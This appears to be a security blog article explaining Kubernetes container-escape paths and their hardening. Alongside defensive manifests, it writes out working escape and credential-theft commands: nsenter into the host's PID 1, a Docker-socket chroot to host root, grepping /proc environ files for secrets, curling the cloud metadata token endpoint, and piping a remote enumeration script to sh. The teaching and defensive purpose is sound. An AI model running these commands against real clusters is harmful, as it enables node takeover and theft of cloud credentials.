A container is not a VM. It's a process running in a restricted namespace with a filtered view of the kernel — same kernel, same underlying hardware. The security boundary is a set of Linux primitives: namespaces, cgroups, seccomp profiles, capabilities, and AppArmor or SELinux policy.
When those primitives are misconfigured, the "container boundary" doesn't exist. And in most production Kubernetes clusters I've reviewed, at least one workload is misconfigured in a way that makes escape trivial.
Here's how it actually works.
The easiest escape: privileged containers
```yaml
securityContext:
  privileged: true
```
This is a complete removal of the container security boundary. A privileged container has all Linux capabilities, can see all host devices, can access the host filesystem, and runs with the same privileges as root on the host node.
Once you're in a privileged container — assuming it also shares the host PID namespace (hostPID: true, a common pairing on node agents) — getting to the host is one command:

```bash
# Enter the namespaces of the host's PID 1 (init/systemd)
nsenter -t 1 -m -u -i -n -p -- bash
```

nsenter enters the namespaces of another process — in this case, PID 1 on the host. You're now running in the host's mount, UTS, IPC, network, and PID namespaces: a root shell on the Kubernetes node. Without hostPID, a privileged container can still escape, because it sees the node's block devices under /dev and can mount the host's root filesystem directly.
From there: read /etc/kubernetes/pki/ for cluster CA keys, read kubelet credentials, access the cloud metadata endpoint for the node's service account credentials, read other containers' filesystem layers, or simply install a backdoor.
I find privileged: true most often on logging agents (Fluentd, Datadog), monitoring tools, and anything that needs to read host filesystem paths. Most of those workloads don't actually need full privilege — they need specific capabilities or specific hostPath mounts. Privileged is what you set when you don't want to figure out the minimum.
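For example, a node-level log collector can usually run without privileged: true at all. A sketch of the minimum-privilege alternative — container name, capability, and paths here are illustrative, not a vendor's recommended config:

```yaml
containers:
- name: log-agent              # illustrative name
  securityContext:
    allowPrivilegeEscalation: false
    capabilities:
      drop:
      - ALL
      # Add back a single capability only if the agent provably needs it,
      # e.g. DAC_READ_SEARCH to read log files owned by other UIDs.
      add:
      - DAC_READ_SEARCH
  volumeMounts:
  - name: pod-logs
    mountPath: /var/log/pods
    readOnly: true
volumes:
- name: pod-logs
  hostPath:
    path: /var/log/pods
    type: Directory
```

Compared with privileged: true, this grants one capability and one read-only path instead of everything.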
hostPath mounts
Even without privileged: true, a hostPath mount of the right directory is often sufficient for escape:
```yaml
volumes:
- name: docker-sock
  hostPath:
    path: /var/run/docker.sock
```
Mounting the Docker socket gives any process in the container the ability to run Docker commands on the host:
```bash
docker run --rm -it -v /:/host alpine chroot /host
```
That creates a new privileged container with the host's root filesystem mounted at /host, then chroots into it. You have root on the host.
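The docker CLI isn't even required: the socket speaks the Docker Engine HTTP API, so curl alone is enough. A guarded sketch (the socket path is the Docker default):

```bash
# Talk to the Docker Engine API directly over the unix socket.
DOCKER_SOCK=/var/run/docker.sock
if [ -S "$DOCKER_SOCK" ]; then
  # /version is the simplest probe; the same API creates containers
  # (POST /containers/create), including one that bind-mounts / from the host.
  curl -s --unix-socket "$DOCKER_SOCK" http://localhost/version
else
  echo "no docker socket at $DOCKER_SOCK"
fi
```

Anyone who can write to the socket is root-equivalent on the node; the API has no authentication of its own.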
/var/run/docker.sock is the obvious one, but similar escapes work with:
- /var/run/containerd/containerd.sock — same pattern, via the containerd socket
- /proc — access to host processes, their environments, and memory
- /sys — control groups and kernel parameters
- /etc — if writable, you can modify host configuration
- /root or /home — read SSH keys, bash history, credentials
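From inside a pod, checking for exposed runtime sockets takes a few lines of shell. The paths below are the common defaults for Docker, containerd, and CRI-O; adjust for your runtime:

```bash
# Probe for container-runtime sockets exposed into this filesystem.
found=0
for sock in /var/run/docker.sock /var/run/containerd/containerd.sock /run/crio/crio.sock; do
  if [ -S "$sock" ]; then
    echo "runtime socket exposed: $sock"
    found=1
  fi
done
[ "$found" -eq 1 ] || echo "no runtime sockets found"
```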
Legitimate hostPath mounts (reading kernel metrics, writing container logs) should use readOnly: true and be scoped to the minimum path:
```yaml
volumes:
- name: varlog
  hostPath:
    path: /var/log/containers
volumeMounts:
- name: varlog
  mountPath: /var/log/host
  readOnly: true
```
hostPID and hostNetwork
```yaml
spec:
  hostPID: true
  hostNetwork: true
```
hostPID: true puts the container in the host's PID namespace. You can now see every process on the node and send signals to them. More usefully from an attacker's perspective: you can read /proc/<pid>/environ for any process, which frequently contains environment variables with secrets:
```bash
# Read the environment of every process on the host
for env_file in /proc/[0-9]*/environ; do
  tr '\0' '\n' < "$env_file" 2>/dev/null | grep -iE 'secret|key|password|token'
done
```
hostNetwork: true puts the container in the host's network namespace. The most useful thing this unlocks is access to the cloud metadata endpoint at 169.254.169.254, which issues credentials for the node's service account. On GKE:
```bash
curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
```
That returns an access token for the GCE service account attached to the node. On most GKE clusters, node service accounts have at minimum logging.logWriter, monitoring.metricWriter, and storage.objectViewer on the project. If someone over-scoped the node SA (common), this token can reach production GCS buckets, Cloud SQL, or worse.
On EKS, the metadata endpoint hands out the EC2 instance profile credentials. On AKS, you get the managed identity token. Same pattern everywhere.
Linux capabilities
Capabilities break root's traditional all-or-nothing model into discrete privileges. Dropping all capabilities and adding back only what's needed is the correct approach. Most workloads don't need any capabilities at all.
The dangerous ones:
CAP_SYS_ADMIN — the kitchen sink. Allows mount operations, namespace creation, device control, BPF programs, ptrace across containers, and a dozen other things. This single capability enables most known container escape techniques.
CAP_NET_ADMIN — can modify network interfaces, routing tables, and firewall rules on the host if combined with hostNetwork.
CAP_SYS_PTRACE — can trace and inject into any process the container can see. With hostPID, this means any process on the node.
CAP_DAC_OVERRIDE — bypasses file permission checks. Can read files owned by other users/processes even without being root.
CAP_CHOWN and CAP_FOWNER — change file ownership, bypass permission checks on owned files.
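You can read your own effective capability set from inside any container. A quick sketch using /proc; capsh (part of libcap) decodes the bitmask to names if it happens to be installed:

```bash
# The effective capability set is a hex bitmask in /proc/self/status.
capeff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
echo "CapEff: $capeff"
# All zeros means no capabilities; a full root set has every bit up to
# CAP_LAST_CAP set. Decode the mask to capability names with capsh:
if command -v capsh >/dev/null 2>&1; then
  capsh --decode="$capeff"
fi
```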
The correct security context for most application containers:
```yaml
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  runAsGroup: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop:
    - ALL
    add: []  # only add specific caps if you've verified they're needed
```
allowPrivilegeEscalation: false sets the kernel's no_new_privs flag, so a process can never gain more privileges than its parent — setuid binaries and file capabilities stop granting anything. This is the flag that stops sudo inside a container.
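Whether the flag is actually in effect is visible from inside the container — the kernel exposes it per-process in /proc:

```bash
# 1 means no_new_privs is set: setuid/file-capability escalation is blocked.
nnp=$(awk '/^NoNewPrivs:/ {print $2}' /proc/self/status)
echo "NoNewPrivs: $nnp"
```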
The service account token vector
Every pod gets a mounted service account token by default:
/var/run/secrets/kubernetes.io/serviceaccount/token
An attacker who escapes a container with this token can call the Kubernetes API with the pod's service account permissions. If the service account has broad permissions (see: Kubernetes RBAC misconfigs), this is a cluster takeover path.
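Using the token is straightforward — the mounted directory contains everything needed to authenticate to the API server (kubernetes.default.svc is the standard in-cluster service name). A guarded sketch:

```bash
# Call the Kubernetes API using the pod's mounted service account credentials.
SA_DIR=/var/run/secrets/kubernetes.io/serviceaccount
if [ -f "$SA_DIR/token" ]; then
  curl -s --cacert "$SA_DIR/ca.crt" \
    -H "Authorization: Bearer $(cat "$SA_DIR/token")" \
    "https://kubernetes.default.svc/api/v1/namespaces/$(cat "$SA_DIR/namespace")/secrets"
else
  echo "no service account token mounted"
fi
```

Whether that secrets listing succeeds depends entirely on the service account's RBAC bindings.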
For pods that don't need to call the Kubernetes API — most application pods — disable the automount:
```yaml
spec:
  automountServiceAccountToken: false
```
Or set it at the service account level to apply to all pods using that SA:
```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-app
automountServiceAccountToken: false
```
For pods that do need API access, use a dedicated service account with minimal permissions rather than the default SA, which often accumulates bindings over time.
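A minimal setup looks like this — a dedicated SA bound to a Role granting exactly the verbs the pod uses (the names and the configmap scope are illustrative):

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-app-reader          # illustrative name
  namespace: production
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: configmap-reader
  namespace: production
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: my-app-reader-binding
  namespace: production
subjects:
- kind: ServiceAccount
  name: my-app-reader
  namespace: production
roleRef:
  kind: Role
  name: configmap-reader
  apiGroup: rbac.authorization.k8s.io
```

A namespaced Role (not a ClusterRole) keeps the blast radius to one namespace even if the token leaks.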
What attackers actually use
Three tools come up in every container escape conversation:
deepce — a shell script that enumerates container escape opportunities. Checks for privileged mode, dangerous capabilities, hostPath mounts, docker socket, writable filesystem, and more. Takes seconds to run.
```bash
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
```
CDK (Container Duck Knife) — a Go binary with escape exploits, not just detection. Has specific exploit modules for docker socket, privileged mode, capability-based escapes, and more.
amicontained — shows you your current capabilities and namespace configuration from inside a container.
If you're doing a security review and have exec access to a pod, these three tools will tell you within seconds whether escape is possible and how.
How to stop it: admission control
Pod security contexts are only enforced if something validates them at admission time. You can write the correct securityContext fields in your manifests, but unless an admission controller rejects pods that don't comply, a misconfigured deploy will still run.
Pod Security Standards (PSS) — built into Kubernetes 1.25+. Three profiles: privileged (no restrictions), baseline (blocks the worst — privileged containers, most hostPath types, hostPID/hostNetwork), and restricted (requires running as non-root, dropping all capabilities, allowPrivilegeEscalation: false, and a seccomp profile). Apply at the namespace level:
```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted
```
OPA/Gatekeeper or Kyverno — policy-as-code admission controllers. More expressive than PSS for custom rules. Example Kyverno policy requiring allowPrivilegeEscalation: false:
```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privilege-escalation
spec:
  validationFailureAction: Enforce
  rules:
  - name: check-privilege-escalation
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: "Privilege escalation is not allowed."
      pattern:
        spec:
          containers:
          - (name): "?*"
            securityContext:
              allowPrivilegeEscalation: false
```
Without admission control, security contexts are advisory. With it, they're enforced at the API server — a misconfigured manifest is rejected before it can run.
Blocking the metadata endpoint
Even if a container can't escape to the host, hostNetwork: true or a misconfigured network policy can let it reach the cloud metadata endpoint and steal node credentials.
On GKE, block metadata endpoint access for pods that don't need it with a NetworkPolicy:
```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata-endpoint
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32  # block GCP metadata endpoint
        - 169.254.169.253/32  # block GKE metadata server
```
GKE Autopilot blocks metadata endpoint access by default through the metadata concealment feature. On Standard GKE, enable Workload Identity — it replaces the instance metadata credentials with per-pod credentials, and the node SA's access to GCP is removed entirely.
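With Workload Identity, the link is an annotation on the Kubernetes service account pointing at a GCP service account. A sketch — the KSA name, namespace, and project ID are placeholders, and it assumes Workload Identity is enabled on the cluster with the matching IAM policy binding on the GCP side:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-app                 # placeholder
  namespace: production
  annotations:
    # Binds this KSA to a GCP service account; pods using this KSA receive
    # that GSA's credentials instead of the node's instance credentials.
    iam.gke.io/gcp-service-account: my-app@my-project.iam.gserviceaccount.com
```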
The security context baseline for production
```yaml
spec:
  hostPID: false
  hostIPC: false
  hostNetwork: false
  automountServiceAccountToken: false
  securityContext:
    runAsNonRoot: true
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    securityContext:
      runAsUser: 1000
      runAsGroup: 1000
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop:
        - ALL
```
seccompProfile: RuntimeDefault enables the container runtime's default seccomp profile, which blocks a significant set of dangerous syscalls (including several used by known escape techniques) without requiring you to write a custom profile.
This isn't a complete defense — admission control, network policies, and RBAC are all also required — but it's the baseline every production workload should meet.